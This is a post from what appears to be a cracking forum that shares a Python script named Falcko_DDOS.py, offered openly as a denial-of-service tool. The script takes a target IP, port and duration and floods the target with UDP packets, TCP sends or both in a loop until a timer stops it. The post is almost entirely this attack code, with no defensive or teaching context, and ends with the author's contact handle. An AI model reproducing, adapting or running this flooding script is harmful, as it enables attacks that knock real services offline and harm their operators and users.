Source Code - script full ddoss Falcko_DDOS.py | Web Scripts | Crax

Welcome To Crax.Pro Forum!

Check our new Marketplace at Crax.Shop

   Login! SignUp Now!
  • We are in solidarity with our brothers and sisters in Palestine. Free Palestine. To learn more visit this Page

  • Crax.Pro domain has been taken down!

    Alternatives: Craxpro.io | Craxpro.com

Source Code script full ddoss Falcko_DDOS.py

Source Code script full ddoss Falcko_DDOS.py

LV
1
 

1ultrapower

Member
Joined
Dec 28, 2023
Threads
10
Likes
3
Awards
4
Credits
3,331©
Cash
0$
import socket
import threading
import argparse

# Fonction pour afficher l'aide
def display_help():
print("Script DDOS by Falcko: Falcko.py <methode>")
print(" udp <ip> <port> <temps>")
print(" tcp <ip> <port> <temps>")

# Fonction pour mettre fin à l'attaque
def stop_attack():
global on
on = False

if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Script DDOS by Falcko")
parser.add_argument("methode", choices=["udp", "tcp", "patator-ip"], help="Méthode d'attaque")
parser.add_argument("ip", type=str, help="Adresse IP de la cible")
parser.add_argument("port", type=int, help="Port de la cible")
parser.add_argument("temps", type=int, help="Durée de l'attaque en secondes")

args = parser.parse_args()

on = False

# Validation des arguments
if args.methode == "udp":
print(f"UDP: {args.ip}:{args.port} {args.temps} sec")
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as udp:
on = True
timer = threading.Timer(args.temps, stop_attack)
timer.start()
while on:
udp.sendto(b"DarthnetWorks", (args.ip, args.port))
elif args.methode == "tcp":
print(f"TCP: {args.ip}:{args.port} {args.temps} sec")
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as tcp:
tcp.connect((args.ip, args.port))
on = True
timer = threading.Timer(args.temps, stop_attack)
timer.start()
while on:
tcp.send(b"DarthnetWorks")
elif args.methode == "patator-ip":
print(f"Patator-ip: {args.ip}:{args.port} {args.temps} sec")
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as udp, socket.socket(socket.AF_INET, socket.SOCK_STREAM) as tcp:
tcp.connect((args.ip, args.port))
on = True
timer = threading.Timer(args.temps, stop_attack)
timer.start()
while on:
udp.sendto(b"DarthnetWorks", (args.ip, args.port))
tcp.send(b"DarthnetWorks")
else:
display_help()

print("Skype : Falcko.rpz")
 

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Log in

Already have an account? Log in here.

Similar threads

Top Bottom